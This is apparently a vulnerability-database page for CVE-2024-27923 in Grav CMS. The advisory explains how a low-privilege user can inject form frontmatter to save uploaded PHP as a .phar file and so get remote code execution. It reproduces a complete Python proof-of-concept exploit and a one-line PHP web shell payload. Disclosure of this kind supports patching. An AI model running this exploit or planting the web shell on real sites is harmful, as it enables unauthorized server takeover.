    res = self.sess.get(self.PREFIX_URL + f"/{self.PAGE_NAME}")
    form_nonce = self._get_nonce(res.text, "form-nonce")
    unique_form_id = self._get_nonce(res.text, "__unique_form_id__")

    form_data = f"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}"

    res = self.sess.post(self.PREFIX_URL + f"/{self.PAGE_NAME}" , data = form_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})

    print("[*] Success inject php code")


def _execute_command(self):
    res = self.sess.get(self.PREFIX_URL + f"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}")

    if res.status_code == 404:
        print("[!] Fail to execute command or not save php file.")
        exit()

    print("[*] This is uploaded php file url.")
    print(self.PREFIX_URL + f"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}")
    print(res.text)

if name == "main": Poc(cmd="id") ```

Impact

Remote Code Execution

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "getgrav/grav"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.43"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-27923"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-434"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-06T16:58:33Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\n- Due to insufficient permission verification, user who can write a page use frontmatter feature.\n- Inadequate File Name Validation\n\n### Details\n1. Insufficient Permission Verification\n\nIn Grav CMS, \"[Frontmatter](https://learn.getgrav.org/17/content/headers)\" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post.\nIn this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. [Video Link](https://www.youtube.com/watch?v=EU1QA0idoWE)\n\n2. Inadequate File Name Validation\n\nTo create a Contact Form, Frontmatter and markdown can be written as follows:\n[Contact Form Example](https://learn.getgrav.org/17/forms/forms/example-form)\n[Form Action Save Option](https://learn.getgrav.org/17/forms/forms/reference-form-actions#save)\nWhen an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of \"feedback.txt,\" a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the \"name\" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the \"name\" field to be saved on the server. However, Grav filter the \u003c and \u003e characters, so to disable these options, an xss_check: false attribute should be added. [Disable XSS](https://learn.getgrav.org/17/forms/forms/form-options#xss-checks)\n\n```\n---\ntitle: Contact Form\n\nform:\n    name: contact\n    xss_check: false\n\n    fields:\n        name:\n          label: Name\n          placeholder: Enter your name\n          autocomplete: on\n          type: text\n          validate:\n            required: true\n\n    buttons:\n        submit:\n          type: submit\n          value: Submit\n\n    process:\n        save:\n            filename: this_is_file_name.phar\n            operation: add\n\n---\n\n# Contact form\n\nSome sample page content\n```\n\nExploiting these two vulnerabilities allows the following scenario:\n\n- A regular user account capable of creating pages is required.\n- An attacker creates a Contact Form page containing malicious Frontmatter using the regular user\u0027s account.\n- Accessing the Contact Form page, the attacker submits PHP code.\n- The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].\n\n### PoC\n\n[PoC Video Link](https://www.youtube.com/watch?v=Gh3ezpORbPc)\n\n```python\n# PoC.py\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass Poc:\n\n    def __init__(self, cmd):\n        self.sess = requests.Session()\n\n        ##########    INIT    ################\n        self.USERNAME = \"guest\"\n        self.PASSWORD = \"Guest123!\"\n        self.PREFIX_URL = \"http://192.168.12.119:8888/grav\"\n        self.PAGE_NAME = \"this_is_poc_page47\"\n        self.PHP_FILE_NAME = \"universe.phar\"\n        self.PAYLOAD = \u0027\u003c?php system($_GET[\"cmd\"]); ?\u003e\u0027\n        self.cmd = cmd\n        ##########    END    ################\n\n        self.sess.get(self.PREFIX_URL)\n        self._login()\n        self._save_page()\n        self._inject_command()\n        self._execute_command()\n    \n\n    def _get_nonce(self, data, name):\n        # Get login nonce value\n        res = BeautifulSoup(data, \"html.parser\")\n        return res.find(\"input\", {\"name\" : name}).get(\"value\")\n\n    \n    def _login(self):\n        print(\"[*] Try to Login\")\n        res = self.sess.get(self.PREFIX_URL + \"/admin\")\n\n        login_nonce = self._get_nonce(res.text, \"login-nonce\")\n\n        # Login\n        login_data = {\n            \"data[username]\" : self.USERNAME,\n            \"data[password]\" : self.PASSWORD,\n            \"task\" : \"login\",\n            \"login-nonce\" : login_nonce\n        }\n        res = self.sess.post(self.PREFIX_URL + \"/admin\", data=login_data)\n\n        # Check login\n        if res.status_code != 303:\n            print(\"[!] username or password is wrong\")\n            exit()\n        \n        print(\"[*] Success Login\")\n\n\n    def _save_page(self):\n        print(\"[*] Try to write page\")\n\n        res = self.sess.get(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\")\n        form_nonce = self._get_nonce(res.text, \"form-nonce\")\n        unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n        # Add page data\n        page_data  = f\"task=save\u0026data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}\u0026data%5Bcontent%5D=content\u0026data%5Bheader%5D%5Bsearch%5D=\u0026data%5Bfolder%5D={self.PAGE_NAME}\u0026data%5Broute%5D=\u0026data%5Bname%5D=form\u0026data%5Bheader%5D%5Bbody_classes%5D=\u0026data%5Bordering%5D=1\u0026data%5Border%5D=\u0026data%5Bheader%5D%5Border_by%5D=\u0026data%5Bheader%5D%5Border_manual%5D=\u0026data%5Bblueprint%5D=\u0026data%5Blang%5D=\u0026_post_entries_save=edit\u0026__form-name__=flex-pages\u0026__unique_form_id__={unique_form_id}\u0026form-nonce={form_nonce}\u0026toggleable_data%5Bheader%5D%5Bpublished%5D=0\u0026toggleable_data%5Bheader%5D%5Bdate%5D=0\u0026toggleable_data%5Bheader%5D%5Bpublish_date%5D=0\u0026toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0\u0026toggleable_data%5Bheader%5D%5Bmetadata%5D=0\u0026toggleable_data%5Bheader%5D%5Bdateformat%5D=0\u0026toggleable_data%5Bheader%5D%5Bmenu%5D=0\u0026toggleable_data%5Bheader%5D%5Bslug%5D=0\u0026toggleable_data%5Bheader%5D%5Bredirect%5D=0\u0026toggleable_data%5Bheader%5D%5Bprocess%5D=0\u0026toggleable_data%5Bheader%5D%5Btwig_first%5D=0\u0026toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0\u0026toggleable_data%5Bheader%5D%5Bchild_type%5D=0\u0026toggleable_data%5Bheader%5D%5Broutable%5D=0\u0026toggleable_data%5Bheader%5D%5Bcache_enable%5D=0\u0026toggleable_data%5Bheader%5D%5Bvisible%5D=0\u0026toggleable_data%5Bheader%5D%5Bdebugger%5D=0\u0026toggleable_data%5Bheader%5D%5Btemplate%5D=0\u0026toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0\u0026toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0\u0026toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0\u0026toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0\u0026toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0\u0026toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0\u0026toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0\"\n        page_data += f\"\u0026data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D\"\n        res = self.sess.post(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\" , data = page_data, headers = {\u0027Content-Type\u0027: \u0027application/x-www-form-urlencoded\u0027})\n\n        print(\"[*] Success write page: \" + self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n\n\n    def _inject_command(self):\n        print(\"[*] Try to inject php code\")\n\n        res = self.sess.get(self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n        form_nonce = self._get_nonce(res.text, \"form-nonce\")\n        unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n        form_data = f\"data%5Bname%5D={self.PAYLOAD}\u0026__form-name__=contact-form\u0026__unique_form_id__={unique_form_id}\u0026form-nonce={form_nonce}\"\n\n        res = self.sess.post(self.PREFIX_URL + f\"/{self.PAGE_NAME}\" , data = form_data, headers = {\u0027Content-Type\u0027: \u0027application/x-www-form-urlencoded\u0027})\n\n        print(\"[*] Success inject php code\")\n\n\n    def _execute_command(self):\n        res = self.sess.get(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n\n        if res.status_code == 404:\n            print(\"[!] Fail to execute command or not save php file.\")\n            exit()\n\n        print(\"[*] This is uploaded php file url.\")\n        print(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n        print(res.text)\n\n\nif __name__ == \"__main__\":\n    Poc(cmd=\"id\")\n```\n\n### Impact\n\nRemote Code Execution\n",
  "id": "GHSA-f6g2-h7qv-3m5v",
  "modified": "2024-03-06T16:58:33Z",
  "published": "2024-03-06T16:58:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/getgrav/grav"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Remote Code Execution by uploading a phar file using frontmatter"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2024-27923 (GCVE-0-2024-27923)

Vulnerability from cvelistv5

gsd-2024-27923

Vulnerability from gsd

fkie_cve-2024-27923

Vulnerability from fkie_nvd

ghsa-f6g2-h7qv-3m5v

Vulnerability from github

Summary

Details

```

Contact form

PoC

PoC.py

Impact

Tags

Sightings

Nomenclature